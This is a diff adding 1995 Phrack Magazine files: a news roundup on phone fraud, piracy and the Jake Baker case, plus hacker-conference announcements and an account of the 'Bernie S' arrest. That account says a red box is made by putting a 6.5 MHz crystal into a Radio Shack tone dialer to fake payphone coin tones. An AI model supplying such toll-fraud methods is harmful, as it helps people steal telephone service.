+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by Dwight Silverman (Houston Chronicle)
+
+The cold hand of Satan knocked on the electronic door of Phoenix Data Systems
+Wednesday night, forcing the Clear Lake-based Internet access provider to
+temporarily shut down some computers.
+
+"These guys can come in and literally take control, get super-user status on
+our systems," said Bill Holbert, Phoenix's owner.  "This is not your
+average piece of shareware."
+
+The attack began about 9 p.m. Wednesday, he said.  Technicians watched for a
+while and then turned off the machines at Phoenix that provide "shell"
+accounts, which allow direct access to a computer's operating system.
+
+The system was back up Thursday afternoon after some security modifications,
+he said.
+
+"It actually taught us a few things," Holbert said.  "I've begun to believe
+that no computer network is secure."
+
+-------------------------------------------------------------------------------
+
+Fraud-free Phones                                                  Feb 13, 1995
+~~~~~~~~~~~~~~~~~
+by Kirk Ladendorf (Austin American Statesman) p. D1
+
+Texas Instruments' Austin-based Telecom Systems business came up with an
+answer to cellular crime:  a voice-authorization service.
+
+The technology, which TI showed off at the Wireless '95 Convention &
+Exposition in New Orleans this month, was adapted from a service devised
+for long-distance telephone companies, including Sprint.
+
+TI says its voice-recognition systems can verify the identity of cellular
+phone users by reading and comparing their "voice prints," the unique sound
+patterns made by their speech.
+
+The TI software uses a statistical technique called Hidden Markov Modeling
+that determines the best option within a range of choices as it interprets a
+voice sample.
+
+If the verification is too strict, the system will reject bona fide users
+when their voice patterns vary too much from the computer's comparison sample.
+If the standard is too lenient, it might approve other users whose voice
+patterns are similar to that of the authentic user.
+
+The system is not foolproof, TI officials said, but beating it requires far
+more time, effort, expense and electronics know-how than most cellular
+pirates are willing to invest.
+
+-------------------------------------------------------------------------------
+
+Nynex Recommends Cellular Phone Customers Use A Password           Feb  9, 1995
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+By Aaron Zitner (The Boston Globe)
+
+Nynex Corp. is asking cellular telephone customers to dial an extra four
+digits with each phone call in an attempt to foil thieves who steal an
+estimated $1.3 million in cellular phone services nationwide each day.
+
+Nynex Mobile Communications Co., has been "strongly recommending" since
+November that all new customers adopt a four-digit personal identification
+number, or PIN. This week, the company began asking all its customers to use
+a PIN.
+
+The Cellular Telecommunications Industry Association estimates that "phone
+thieves" made $482 million in fraudulent calls last year, equal to 3.7
+percent of the industry's total billings. Thieves can make calls and bill
+them to other people by obtaining the regular 10-digit number assigned to a
+person's cellular phone, as well as a longer electronic serial number that is
+unique to each phone.
+
+Thieves can snatch those numbers from the air using a specialized scanner,
+said James Gerace, a spokesman for Nynex Mobile Communications. Even when no
+calls are being made, cellular phones broadcast the two numbers every 30
+seconds or so to notify the cellular system in case of incoming calls, he said.
+
+When customers adopt a PIN, their phone cannot be billed for fraudulent calls
+unless the thieves also know the PIN, Gerace said. He said the phone broadcasts
+the PIN at a different frequency than the phone's electronic serial number,
+making it hard for thieves to steal both numbers with a scanner.
+
+Gerace also noted that customers who become victims of fraud despite
+using a PIN can merely choose a new number. Victims who do not use a PIN
+must change their phone number, which requires a visit to a cellular phone
+store to have the phone reprogrammed, he said.
+
+[ Uh, wait a second.  Would you use touch-tone to enter this PIN?  Woah.
+  Now that's secure.  I've been decoding touch-tone by ear since 1986.
+  What a solution!  Way to go NYNEX! ]
+
+-------------------------------------------------------------------------------
+
+Kemper National Insurance Offers PBX Fraud                         Feb  3, 1995
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+(Knight-Ridder News Sources)
+
+Kemper National Insurance Cos. now offers inland marine insurance
+coverage to protect Private Branch Exchange (PBX) systems against toll fraud.
+
+"Traditional business equipment policies companies buy to protect their PBX
+telephone systems do not cover fraud," a Kemper spokesman said.
+The Kemper policy covers both the equipment and the calls made illegally
+through the equipment.
+
+The coverage is for the PBX equipment, loss of business income from missed
+orders while the PBX system is down, and coverage against calls run up on
+an insured's phone systems. The toll fraud coverage is an option to the PBX
+package.
+
+-------------------------------------------------------------------------------
+
+New Jersey Teen To Pay $25,000 To Microsoft, Novell              Feb  6, 1995
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+The Wall Street Journal
+
+Microsoft Corp. and Novell Inc. reached a court-approved settlement with
+a New Jersey teenager they accused of operating a computer bulletin board
+that illegally distributed free copies of their copyrighted software programs.
+
+Equipped with a court order, employees of the two companies and federal
+marshals raided the young man's house in August, seizing his computer
+equipment and shutting down an operation called the Deadbeat Bulletin Board.
+Under the settlement announced Friday, the teenager agreed to pay $25,000 to
+the companies and forfeit the seized computer equipment. In return, the
+companies agreed to drop a copyright infringement lawsuit brought against
+him in federal court in New Jersey, and keep his identity a secret.
+
+Redmond-based Microsoft and Novell, Provo, Utah, opted to take action against
+the New Jersey man under civil copyright infringement laws rather than pursue
+a criminal case. The teenager had been charging a fee to users of the Deadbeat
+Bulletin Board, which was one reason the companies sought a cash payment, a
+Novell spokesperson said. The two software producers previously settled a
+similar case in Minneapolis, when they also seized the operator's equipment
+and obtained an undisclosed cash payment.
+
+"About 50 groups are out there engaging in piracy and hacking," said Edward
+Morin, manager of Novell's antipiracy program. He said they operate with
+monikers such as Dream Team and Pirates With Attitude.
+
+-------------------------------------------------------------------------------
+
+Software Piracy Still A Big Problem In China                       Mar  6, 1995
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+By Jeffrey Parker (Reuters News Sources)
+
+
+Sales of pirated software have reached a fever pitch in Beijing in the week
+since U.S. and Chinese officials defused a trade war with a broad accord to
+crush such intellectual property violations.
+
+In the teeming "hacker markets" of the Zhongguancun computer district near
+Beijing University, there were few signs of any clampdown Monday, the sixth
+day of a "special enforcement period" mandated by the Feb. 26 Sino-U.S. pact.
+
+"The police came and posted a sign at the door saying software piracy is
+illegal," said a man selling compact disk readers at bustling Zhongguancun
+Electronics World.
+
+"But look around you. There's obviously a lot of profit in piracy," he said.
+
+A score of the market's nearly 200 stalls openly sell compact disks loaded
+with illegal copies of market-leading desktop software titles, mostly the
+works of U.S. firms.
+
+Cloudy Sky Software Data Exchange Center offers a "super value" CD-ROM for
+188 yuan ($22) that brims with 650 megabytes of software from Microsoft,
+Lotus and other U.S. giants whose retail value is about $20,000, nearly
+1,000 times higher.
+
+
+-------------------------------------------------------------------------------
+
+Internet Story Causes Trouble                                      Feb  7, 1995
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+(AP News Sources)
+
+The University of Michigan has refused to reinstate a sophomore suspended
+last week after he published on the Internet a graphic rape and torture
+fantasy about a fellow student.
+
+The student's attorney told The Detroit News on Monday that the
+university is waiting until after a formal hearing to decide if the
+20-year-old student is a danger to the community. A closed hearing
+before a university administrator is scheduled for Thursday.
+
+"Our position is that this is a pure speech matter," said Ann
+Arbor attorney David Cahill. "He doesn't know the girl and has
+never approached her. He is not dangerous. ... He just went off
+half-cocked."
+
+The Jan. 9 story was titled with the female student's last name
+and detailed her torture, rape and murder while gagged and tied to
+a chair.
+
+The student also may face federal charges, said FBI Special
+Agent Gregory Stejskal in Ann Arbor. Congress recently added
+computer trafficking to anti-pornography laws.
+
+The student was suspended Thursday by a special emergency order
+from university President James J. Duderstadt. His identification
+card was seized and he was evicted from his university residence
+without a hearing.
+
+University spokeswoman Lisa Baker declined to comment.
+
+-------------------------------------------------------------------------------
+
+Snuff Porn On The Net                                              Feb 12, 1995
+~~~~~~~~~~~~~~~~~~~~~
+by Philip Elmer-Dewitt (Time)
+
+Jake Baker doesn't look like the kind of guy who would tie a woman by her
+hair to a ceiling fan. The slight (5 ft. 6 in., 125 lbs.), quiet, bespectacled
+sophomore at the University of Michigan is described by classmates as gentle,
+conscientious and introverted.
+
+But Baker has been doing a little creative writing lately, and his words have
+landed him in the middle of the latest Internet set-to, one that pits a
+writer's First Amendment guarantees of free speech against a reader's right
+to privacy. Now Baker is facing expulsion and a possible sentence of five
+years on federal charges of sending threats over state lines.
+
+It started in early December, when Baker composed three sexual fantasies and
+posted them on alt.sex.stories, a newsgroup on the Usenet computer network
+that is distributed via the Internet. Even by the standards of alt.sex.stories,
+which is infamous for explicit depictions of all sorts of sex acts, Baker's
+material is strong stuff. Women (and young girls) in his stories are
+kidnapped, sodomized, mutilated and left to die by men who exhibit no remorse.
+Baker even seemed to take pleasure in the behavior of his protagonists and
+the suffering of their victims.
+
+The story that got Baker in trouble featured, in addition to the ceiling fan,
+acts performed with superglue, a steel-wire whisk, a metal clamp, a spreader
+bar, a hot curling iron and, finally, a match. Ordinarily, the story might
+never have drawn attention outside the voyeuristic world of Usenet sex groups,
+but Baker gave his fictional victim the name of a real female student in one
+of his classes.
+
+Democratic Senator James Exon of Nebraska introduced legislation earlier
+this month calling for two-year prison terms for anyone who sends, or
+knowingly makes available, obscene material over an electronic medium.
+"I want to keep the information superhighway from resembling a red-light
+district," Exon says.
diff --git a/phrack47/3.txt b/phrack47/3.txt
new file mode 100644
index 0000000..0c623e8
--- /dev/null
+++ b/phrack47/3.txt
@@ -0,0 +1,1746 @@
+                         ==Phrack Magazine==
+
+              Volume Six, Issue Forty-Seven, File 3 of 22
+
+
+                           //   //  /\   //   ====
+                          //   //  //\\ //   ====
+                         ==== //  //  \\/   ====
+
+                     /\   //  // \\    //  /===   ====
+                    //\\ //  //   //  //   \=\   ====
+                   //  \\/    \\ //  //   ===/  ====
+
+                                 PART I
+
+------------------------------------------------------------------------------
+
+-----BEGIN PGP SIGNED MESSAGE-----
+
+
+
+
+  Phrack Magazine and Computer Security Technologies proudly present:
+
+                     The 1995 Summer Security Conference
+
+ SSSS  U    U  M     M  M     M   EEEEE   RRRR     CCCC   OOOO    N   N
+S      U    U  MM   MM  MM   MM   E       R   R   C      O    O   NN  N
+ SSS   U    U  M M M M  M M M M   EEE     RRRR    C      O    O   N N N
+    S  U    U  M  M  M  M  M  M   E       R  R    C      O    O   N  NN
+SSSS    UUUU   M     M  M     M   EEEEE   R   R    CCCC   OOOO    N   N
+
+                               "SUMMERCON"
+
+      June 2-4 1995 @ the Downtown Clarion Hotel in Atlanta, Georgia
+
+This is the official announcement and open invitation to the 1995
+incarnation of Summercon.  In the past, Summercon was an invite-only
+hacker gathering held annually in St. Louis, Missouri.  Starting
+with this incarnation, Summercon is open to any and all interested
+parties:  Hackers, Phreaks, Pirates, Virus Writers, System Administrators,
+Law Enforcement Officials, Neo-Hippies, Secret Agents, Teachers,
+Disgruntled Employees, Telco Flunkies, Journalists, New Yorkers,
+Programmers, Conspiracy Nuts, Musicians and Nudists.
+
+LOCATION:
+
+The Clarion Hotel is located in downtown Atlanta, 9 miles from
+Hartsfield International Airport and just a few blocks from the
+Peachtree Center MARTA Station.
+
+
+Considering the exorbitant expenses involved with attending other
+conferences of this type, Rooms at Summercon are reduced to
+
+                $65 per night for Single or Double Occupancy
+
+      The Clarion Hotel Downtown, Courtland at 70 Houston St., NE,
+                           Atlanta, GA 30303
+       (404) 659-2660 or (800) 241-3828   (404) 524-5390 (fax)
+
+
+No one likes to pay a hundred dollars a night.  We don't expect you
+to have to.  Spend your money on room service, drinks in the hotel bar,
+or on k-rad hacker t-shirts.  Remember:  Mention that you are attending
+Summercon in order to receive the discount.
+
+DIRECTIONS
+
+75/85 Southbound - Exit 97 (Courtland).  Go 3 blocks south on Courtland
+          then turn left on Houston (John Wesley Dobbs Ave.)
+20 East - Exit 75/85 North at International.  Turn Left on Courtland at
+          Houston Ave. NE. (aka. John Wesley Dobbs Ave. NE.)
+20 West - Exit 75/85 North at International.  One block to Courtland
+          and right at Houston Ave. NE. (John Wesley Dobbs Ave. NE.)
+
+Atlanta Airport Shuttle - The Express Bus that leaves from Atlanta's
+International Airport will drop you off at many hotels in the downtown
+area, including the Clarion.  The shuttle should be no more than 12
+dollars.  Fares may be paid at the Airport Shuttle in the Ground
+Transportation area of the Airport Terminal.
+
+MARTA - The Metropolitan Atlanta Rapid Transit Authority (MARTA), is a
+convenient and inexpensive way to negotiate most of the Atlanta area.
+Take the MARTA train from the Airport to the Peach Tree Center Station.
+Walk three blocks down Houston to the intersection of Houston and
+Courtland.  The MARTA fare will be roughly 2 dollars.
+
+Taxis - The average cab fare from Atlanta's Airport to the downtown area
+is roughly 30 dollars.
+
+CONFERENCE INFO
+
+It has always been our contention that cons are for socializing.
+"Seekret Hacker InPh0" is never really discussed except in private
+circles, so the only way anyone is going to get any is to meet new people
+and take the initiative to start interesting conversations.
+
+Because of this, the formal speaking portion of Summercon will be
+held on one day, not two or three, leaving plenty of time for people
+to explore the city, compare hacking techniques, or go trashing and
+clubbing with their heretofore unseen online companions.
+
+The "Conference" will be held on June 3rd from roughly 11:00 am until
+6:00 pm with a 1 hour lunch break from 1:00 to 2:00.
+
+NO VIDEO TAPING WILL BE ALLOWED IN THE CONFERENCE ROOM.  Audio Taping
+and still photography will be permitted.
+
+
+CURRENT LIST OF SPEAKERS:
+
+Robert Steele   - Ex-Intelligence Agent, Founder and CEO of Open Source
+                  Solutions (a private sector intelligence firm)
+
+           Topic: Hackers from the Intelligence Perspective
+
+Winn Schwartau  - Author of "Information Warfare" and "Terminal Compromise",
+                  Publisher of Security Insider Report, and noted security
+                  expert
+
+           Topic: Electromagnetic Weaponry
+
+Bob Stratton    - Information Security Expert from one of America's largest
+                  Internet service providers
+
+           Topic: The Future of TCP/IP Security
+
+Eric Hughes     - Cryptography Expert and founding member of the "Cypherpunks"
+
+           Topic: Cryptography, Banking, and Commerce
+
+Annaliza Savage - London-based Director/Producer
+
+           Topic: Discussion of her documentary "Unauthorized Access"
+                  (Followed by a public screening of the film)
+
+Chris Goggans   - Editor of Phrack Magazine and Summercon M.C.
+
+           Topic: introductions, incidentals and a topic which is sure
+                  to culminate in an international incident.
+
+
+(Other Speakers May Be Added - Interested parties may contact scon@fc.net)
+
+COSTS
+
+Since other cons of this type have been charging from 25 to 40 dollars
+entry fees, we are only charging 10 dollars.  Yes, that's correct,
+TEN (10) dollars in US currency.  Money is far too scarce among the
+hacker community to fleece everyone for money they will probably need
+to eat with or pay for their hotel rooms.
+
+
+WHAT TO DO IN ATLANTA:
+
+To attempt to make everyone's stay in Atlanta more exciting, we are
+contacting local establishments to arrange for special discounts and/or
+price reductions for Summercon attendees.  Information will be handed
+out regarding these arrangements at the conference.
+
+Atlanta is a happening town.
+
+Touristy Stuff                            Party Time
+
+  The World of Coca-Cola                    Buckhead
+  Underground Atlanta                       The Gold Club
+  Georgia Dome (Baseball?)                  (Countless Other Clubs and Bars)
+  Six Flags
+
+CONTACTING SUMMERCON SPONSORS
+
+You can contact the Summercon sponsors by several means:
+
+    E-mail:     scon@fc.net
+
+       WWW:     http://www.fc.net/scon.html
+
+Snail Mail:     Phrack Magazine
+  603 W. 13th #1A-278
+  Austin, TX 78701
+
+
+If deemed severely urgent, you can PGP your email with the following PGP
+key:
+
+- -----BEGIN PGP PUBLIC KEY BLOCK-----
+Version: 2.6
+
+mQCNAizMHvgAAAEEAJuIW5snS6e567/34+nkSA9cn2BHFIJLfBm3m0EYHFLB0wEP
+Y/CIJ5NfcP00R+7AteFgFIhu9NrKNJtrq0ZMAOmiqUWkSzSRLpwecFso8QvBB+yk
+Dk9BF57GftqM5zesJHqO9hjUlVlnRqYFT49vcMFTvT7krR9Gj6R4oxgb1CldAAUR
+tBRwaHJhY2tAd2VsbC5zZi5jYS51cw==
+=evjv
+- -----END PGP PUBLIC KEY BLOCK-----
+
+
+See you in Atlanta!
+
+
+
+
+-----BEGIN PGP SIGNATURE-----
+Version: 2.6
+
+iQCVAwUBL4mMEaR4oxgb1CldAQE5dQP+ItUraBw4D/3p6UxjY/V8CO807qXXH6U4
+46ITHnRJXWfEDRAp1jwl+lyavoo+d5AJPSVeeFt10yzVDEOb258oEZkIkciBnr7q
+mUu563/Qq67gBsOWYP7sLdu3KEgedcggkzxtUzPxoVRVZYkHWKKjkG1t7LiT3gQ5
+uRix2FrftCY=
+=m/Yt
+-----END PGP SIGNATURE-----
+
+------------------------------------------------------------------------------
+
+UNAUTHORIZED ACCESS
+
+"Unauthorized Access [is] a documentary that tells the story of the
+computer underground from our side, it captures the hacker world
+from Hamburg to Los Angeles and virtually everywhere in between."
+                                        2600  The Hacker Quarterly
+
+Computers are becoming an integral part of our everyday existence.
+They are used to store and send a multitude of information, from
+credit reports and bank withdrawals, to personal letters and highly
+sensitive military documents.  So how secure are our computer
+systems?
+
+The computer hacker is an expert at infiltrating secured systems,
+such as those at AT&T, TRW, NASA or the DMV.  Most computer systems
+that have a telephone connection have been under siege at one time
+or another, many without their owner's knowledge.  The really good
+hackers can reroute the telephone systems, obtain highly sensitive
+corporate and government documents, download individual's credit
+reports, make free phone calls globally, read private electronic
+mail and corporate bulletins and get away without ever leaving a
+trace.
+
+So who are these hackers?  Just exactly WHAT do they do and WHY do
+they do it?  Are they really a threat?  What do they DO with the
+information that they obtain?  What are the consequences of their
+actions? Are hackers simply playing an intellectual game of chess
+or are hackers using technology to fight back and take control of
+a bureaucratic system that has previously appeared indestructible?
+
+Unauthorized Access is a documentary that demistifies the hype and
+propaganda surrounding the computer hacker.  Shot in 15 cities
+and 4 countries, the film hopes to expose the truths of this subculture
+focusing on the hackers themselves.
+
+Unauthorized Access is a view from inside the global underground.
+
+For a PAL (European) copy send a cheque/postal order for 15 British
+Pounds or $25 for NTSC (American) standard to:
+
+Savage Productions
+Suite One
+281 City Road
+London  EC1V 1LA
+
+------------------------------------------------------------------------------
+
+                            ACCESS ALL AREAS
+                           Hacking Conference
+
+                          1st - 2nd July, 1995
+                          (Saturday  & Sunday)
+                       King's College, London, UK
+
+
+-------------------------------WHAT-IT-IS---------------------------------
+
+The first UK hacking conference, Access All Areas, is to be run in London
+later this year.  It is aimed at hackers, phone phreaks, computer security
+professionals, cyberpunks, law enforcement officials, net surfers,
+programmers, and the computer underground.
+
+It will be a chance for all sides of the computer world to get together,
+discuss major issues, learn new tricks, educate others and meet "The
+Enemy".
+
+
+
+-------------------------------WHERE-IT-IS--------------------------------
+
+Access All Areas is to be held during the first weekend of July, 1995 at
+King's College, London.  King's College is located in central London on
+The Strand and is one of the premier universities in England.
+
+
+
+-----------------------------WHAT-WILL-HAPPEN-----------------------------
+
+There will be a large lecture theatre that will be used for talks by
+computer security professionals, legal experts and hackers alike.  The
+topics under discussion will include hacking, phreaking, big brother and
+the secret services, biometrics, cellular telephones, pagers, magstrips,
+smart card technology, social engineering, Unix security risks, viruses,
+legal aspects and much, much more.
+
+Technical workshops will be running throughout the conference on several
+topics listed above.
+
+A video room, equipped with multiple large screen televisions, will be
+showing various films, documentaries and other hacker related footage.
+
+The conference facilities will also include a 10Mbps Internet link
+connected to a local area network with various computers hanging off of it
+and with extra ports to connect your laptop to.
+
+
+
+------------------------------REGISTRATION--------------------------------
+
+Registration will take place on the morning of Saturday 1st July from
+9:00am until 12:00 noon, when the conference will commence.  Lectures and
+workshops will run until late Saturday night and will continue on Sunday
+2nd July from 9:00am until 6:00pm.
+
+
+
+----------------------------------COST------------------------------------
+
+The price of admission will be 25.00 British pounds (approximately US $40.00)
+at the door and will include a door pass and conference programme.
+
+
+
+-----------------------------ACCOMMODATION--------------------------------
+
+Accommodation in university halls of residence is being offered for the
+duration of the conference.  All prices quoted are per person, per night
+and include full English breakfast. (In British pounds)
+
+
+                             SINGLE       TWIN
+        WELLINGTON HALL       22.00       16.75
+
+
+Special prices for British and Overseas university students, holding
+current student identification, are also available - please call King's
+Campus Vacation Bureau for details.
+
+All bookings must be made directly with the university.  They accept
+payment by cash, cheque and credit card.
+
+To making a booking call the following numbers...
+
+
+        KING'S CAMPUS VACATION BUREAU
+
+        Telephone : +44 (0)171 351 6011
+        Fax       : +44 (0)171 352 7376
+
+
+
+----------------------------MORE-INFORMATION------------------------------
+
+If you would like more information about Access All Areas, including
+pre-registration details then please contact one of the following...
+
+
+        Telephone : +44 (0)973 500202
+        Fax       : +44 (0)181 224 0547
+        Email     : info@phate.demon.co.uk
+
+
+
+------------------------------------------------------------------------------
+
+                D I S T R I B U T E  W I D E L Y
+
+                 *****FIRST CALL FOR PAPERS*****
+
+                        InfoWarCon '95
+
+               A 2 Day International Symposium
+                     on Information Warfare
+
+                      September 7-8, 1995
+                   Stouffer Concourse Hotel
+                        Arlington, VA
+
+                        Presented by:
+             National Computer Security Association
+               Winn Schwartau and Interpact, Inc.
+                   Robert Steele and OSS, Inc.
+
+
+CONFERENCE OVERVIEW:
+
+The  Information  Warfare Conference (InfoWarCon)  is  our third
+international  conference  dedicated to the  exchange  of  ideas,
+policies,  tactics, weapons, methodologies and defensive  posture
+of Information Warfare on a local, national, and global basis.
+
+InfoWarCon will bring together international experts from a broad
+range  of disciplines to discuss and integrate concepts  in  this
+rapidly  evolving field.  Attendees will intensely interact  with
+the  speakers  and presenters as well as each other  to  increase
+each other's understanding of the interrelatedness of the topics.
+
+While  there are many interpretations of Information  Warfare  by
+different groups, the current working definition we employ is:
+
+     Information  Warfare is the use of information and  informa
+     tion systems as weapons in a conflict where information  and
+     information systems are the targets.
+
+Information  Warfare  is broken down into three  categories,  and
+InfoWarCon speakers and attendees will interactively examine them
+all:
+
+     Class  I:  Personal Privacy.  "In Cyberspace You Are  Guilty
+     Until Proven Innocent."  The mass psychology of information.
+     Privacy versus stability and law enforcement.
+
+     Class  II: Industrial and Economic Espionage.  Domestic  and
+     international  ramifications  and  postures  in  a  globally
+     networked, competitive society.
+
+     Class III: Global Information Warfare.  Nation-state  versus
+     Nation-state  as an alternative to convention  warfare,  the
+     military perspective and terrorism.
+
+THE CONFERENCE
+
+The  conference  is designed to be interactive -  with  extensive
+interaction  between all participants. The  preliminary  contents
+and discussions will focus on:
+
+ - What is Information Warfare?
+ - What Are the Targets?
+ - Protecting the Global Financial Infrastructure
+ - Military Perspectives on InfoWar
+ - InfoWar Vs. Non-Lethal Warfare
+ - Defending the U.S. Infrastructure
+ - The Intelligence Community and Information
+ - Open Source Intelligence
+ - The Psychology of Information
+ - Privacy Balances
+ - Information As the Competitive Edge
+ - International Cooperation
+ - Denial of Service
+ - Cyber-Terrorism
+ - Offensive Terrorism
+ - Offensive InfoWar Techniques
+ - Defensive InfoWar Postures
+ - Education and Awareness Training
+ - Corporate Policy
+ - Government Policy
+ - Global Policy
+ - Espionage
+ - Export Controls of Information Flow
+ - The Legal Perspective
+ - The New Information Warriors
+
+Plenary sessions will accommodate all attendees, while  break-out
+sessions will provide more intimate presentations and interactiv
+ity on topics of specific interests.
+
+SUBMISSIONS:
+
+Submission  for papers are now be accepted.  We are  looking  for
+excellent speakers and presenters with new and novel concepts  of
+Information Warfare.  You may submit papers on the topics  listed
+above,  or on others of interest to you, your company or  govern
+ment.
+
+We  welcome innovative thought from the private sector, the  gov
+ernment  (civilian, military and intelligence) and  the  interna
+tional  community.  Submissions must be received by May 1,  1995,
+and  notification  of  acceptance will occur  by  June  1,  1995.
+Please    submit    2-3   page    presentation    outlines    to:
+
+                        winn@infowar.com.
+
+All  submissions  and the contents of InfoWarCon '95 will  be  in
+English.   If you must submit a hard copy: Fax:  813.393.6361  or
+snail  mail  to:  Interpact, Inc. 11511 Pine  St.,  Seminole,  FL
+34642
+
+All submissions and presentation should be unclassified, as  they
+will become Open Source upon submission and/or acceptance.
+
+SPONSORS:
+
+The Information Warfare Symposium is currently choosing  sponsors
+for various functions.
+
+ Continental Breakfast, Day 1 and Day 2
+ Morning Coffee Break, Day 1 and Day 2
+ Lunch, Day 1 and Day 2
+ Afternoon Coffee Break, Day 1 and Day 2
+ Cocktail Party, Day 1
+
+Each Corporate or Organizational sponsor will be included in  all
+promotional  materials and  Symposium function.   For more infor-
+mation, contact Paul Gates at  the NCSA.  Voice: 717.258.1816  or
+email: 747774.1326@Compuserve.com.
+
+EXHIBITS:
+
+Limited space is available for table-top displays for  commercial
+or  governmental products, services, educational or other  promo
+tion. For further information, contact Paul Gates at the National
+Computer Security  Association. 717.258.1816
+
+REGISTRATION:
+
+     Payment made BEFORE July 1, 1995:
+
+                (   )  $445.00     NCSA Member/OSS Attendee
+  (   )  $545.00     All others
+
+     Payment made AFTER July 1, 1995:
+
+  (   )  $495.00     NCSA Members/OSS Attendees
+  (   )  $595.00     All others
+
+(  )  I'M INTERESTED, but would like more information sent to the
+      address above.  Please include a free copy of your 32 page
+      "Information Security Resource Catalog".
+
+(  )  I'd like to know more about NCSA on-site training, security
+      audits and  consulting services.  Please have someone give me
+      a call.
+
+MAIL OR FAX TO:
+
+                 National Computer Security Association
+                 10 South Courthouse Avenue
+                 Carlisle, PA 17013
+                 Phone 717-258-1816 or FAX 717-243-8642
+                 EMAIL:       74774.1326@compuserve.com
+                 CompuServe:  GO NCSAFORUM
+
+  Winn Schwartau Interpact, Inc.
+  Information Security & Warfare
+  V:813.393.6600 F:813.393.6361
+            Email: Winn@Infowar.Com
+
+------------------------------------------------------------------------------
+
+    Ed Cummings, also known to many in cyberspace as "Bernie S" was arrested
+on March 13th, 1995 for 2 misdemeanors of possession, manufacture and sale
+of a device to commit Telecommunications fraud charges. He is being held in
+Delaware County Prison in lieu of $100,000.00 Bail. His story follows.
+
+    On the evening of the 13th Bernie S. received a page from his mail drop.
+Some people he knew from Florida had stopped in at his mail drop thinking
+it was his address.  They were looking to purchase several 6.5 Mhz Crystals.
+These crystals when used to replace the standard crystal in the RADIO SHACK
+Hand Telephone dialer, and with some programming, produce tones that trick
+pay phones into believing they have received coins.  These are commonly
+referred to as "red boxes" and got their name from an actual red box pulled
+from a pay phone in the late seventies by some curious person.
+
+    Ed Cummings met these people at a local 7-11 (which 7-11?) where he was
+to sell the widely used electronic timing crystals for roughly $4 a piece.
+The purchaser only had two twenty dollar bills and Ed Cummings no change.
+Ed Cummings went into the 7-11 to get some change to make the transaction.
+A police officer noticed a van parked in the parking lot of the 7-11 with
+more several African Americans inside.  As Ed was leaving the 7-11 he noticed
+fifteen police cars pulling into the parking lot of the 7-11.
+
+    Next thing he knew the police were asking him if they could `rifle`
+through his car.  He said no.  Moments later as he was talking to a Detective
+and noticed another police officer going through his car.  He asked the officer
+to stop.  They did not, in all the police confiscated a few hundred 6.5Mhz
+crystals (which he resells for roughly $4 a piece) and a large box of 100
+dialers.  The police told him they would get back to him,  and he could have
+his electronics back if the contents of the bag were legal.  In the contents
+of the seized items was one modified dialer, that a customer returned after
+modification explaining that it did not work, a broken red box.
+
+    The next day Ed `Bernie S.` Cummings was over at a friend`s house working
+on their computer when eight to ten plain clothed armed men burst into the
+house and ordered him and his friends to freeze.  They cuffed him and took him
+to a holding cell (what jail?).  There he was left without a blanket or jacket
+to sleep with in the cold cell.
+
+    That evening the Secret Service had been called in when someone figured
+out what the dialers and crystals would do when put together.  The
+United States Secret Service found his home and entered it, while they were
+questioning him.
+
+    The next morning at his arraignment he was finally told of the charges
+he was being held upon. They were Two misdemeanor Charges of manufacture,
+Distribution and Sale of devices of Telecommunications Fraud. and Two Unlawful
+use of a computer charges. His bail was automatically set to $100,000.00
+because Ed Cummings refused talk with the police without his attorney present.
+
+    The Secret Service presented to the judge a 9 page inventory of what
+they had found in his home.   On that inventory there 14 computers. 2 printers.
+more Boxes of bios chips for the systems he worked with. Eprom burners which
+the Federal Agents had labeled "Cellular telephone chip reprogramming adapters"
+Eproms are used in everything from Automobile computers to personal computers.
+They also confiscated his toolbox of screw drivers, wire clippers and other
+computer oriented tools he used for his consulting job.
+
+    The Judge dropped the Two unlawful use of a computer charges due to
+the fact that the evidence was circumstantial and the county had no actual
+evidence that Ed had ever used the computers in question.
+
+    As of 3/27/1995 Ed Cummings is still in Delaware County Prison
+awaiting his trial.  His trial has not yet been scheduled and Ed will most
+likely not raise the One Hundred Thousand Dollars needed to be released on
+bail.
+
+------------------------------------------------------------------------------
+
+"Don't believe the hype."  -  Public Enemy, 1988
+
+This file's purpose is to clear up any misconceptions about the recent
+situation that has come upon the sociopolitical group known as KoV.
+
+As it stands now, (10:55 PM EST on 1/29/95), NO ONE has been busted for
+ANYTHING. We have received several tip-offs from private sources regarding
+a supposed "FBI investigation" of our group that is purported to be active
+at this very minute. However, with the exception of a few VERY suspicious
+incidents and coincidences, there has been NO HARD EVIDENCE thus far about
+ANYONE getting busted for ANYTHING. So while we are EXTREMELY concerned for
+the integrity of our innocence, we must stress that nothing has gone down.
+
+Yet.
+
+We have very good reason to believe that a few of those among us are about
+to be charged with various false accusations by a local university. However
+the current mental state of the person in charge of this charade is also in
+question. Therefore it would be logical to assume nothing. The conflicting
+tip-offs, rumors, warnings and threats that we have received make it even
+more difficult to get a clear picture of exactly what is going on. We have
+heard so many things from so many different sources, both credible and
+questionable, that we would be hard-pressed to give an accurate evaluation
+of the current state of things.
+
+What we can say for sure, however, is that KoV officially died on Monday,
+January 23, 1995, along with its communications network, KoVNet. This
+promises to be a great loss to the open-minded and sociopolitical community
+as well as the free-thinkers and activists who supported us so generously.
+Our reasons for disbanding the group were many, but the foremost was in
+light of the current situation we are facing.
+
+Consider this last obstacle our final, stalwart stand against the evils of
+AmeriKKKan government and its various greedy, capitalistic agencies.
+From the moment of KoV's conception, they have publicly sought to destroy
+us; to silence our questioning of authority, to oppress our free-thinking
+minds, and to close off our intellectual channels of communication. They
+have even gone so far as to stalk us in public places. 'Tis a shame indeed.
+
+If you have any questions or if you wish to contact us for any reason,
+you may email sgolem@pcnet.com with the subject or header of "ATTN: KoV".
+I will try to post further updates of this saga to CiPNet, ThrashNet,
+QuantumNet, InsanityNet, ScumNet, FizzNet, NukeNet and any others I can.
+We would appreciate any support that other h/p, art or political groups can
+lend us. Until then, my friends...
+
+-Lord Valgamon, Malicious Intent, Onslaught, Leland Gaunt & the rest of KoV
+
+------------------------------------------------------------------------------
+
+                What happens when you are caught beige boxing.
+
+                        by Rush 2
+
+
+        Yeah yeah, I'm the only one.  But here is a generally interesting
